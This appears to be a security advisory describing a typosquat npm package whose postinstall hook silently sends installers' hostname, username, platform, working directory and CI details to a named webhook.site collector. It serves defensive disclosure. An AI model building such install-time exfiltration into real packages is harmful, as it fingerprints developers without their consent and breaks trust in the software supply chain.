On npm install, postinstall.js issues an HTTPS GET to https://webhook.site/18dc4281-d366-438a-9186-76fbcd56ade5 with query parameters containing the installer's hostname (os.hostname()), username (os.userInfo()), platform (os.platform()), current working directory, CI environment indicators, package name/version, and a timestamp. Errors are silently swallowed to avoid breaking the install. The package's own description self-identifies as a typosquat placeholder for the @getd/* scoped namespace, so any developer who mistypes the intended package name is fingerprinted without consent. Regardless of the author's stated 'defensive security research' rationale, the technical behavior is unconsented installer-side identifier exfiltration to a third-party webhook collector triggered automatically by the postinstall lifecycle hook.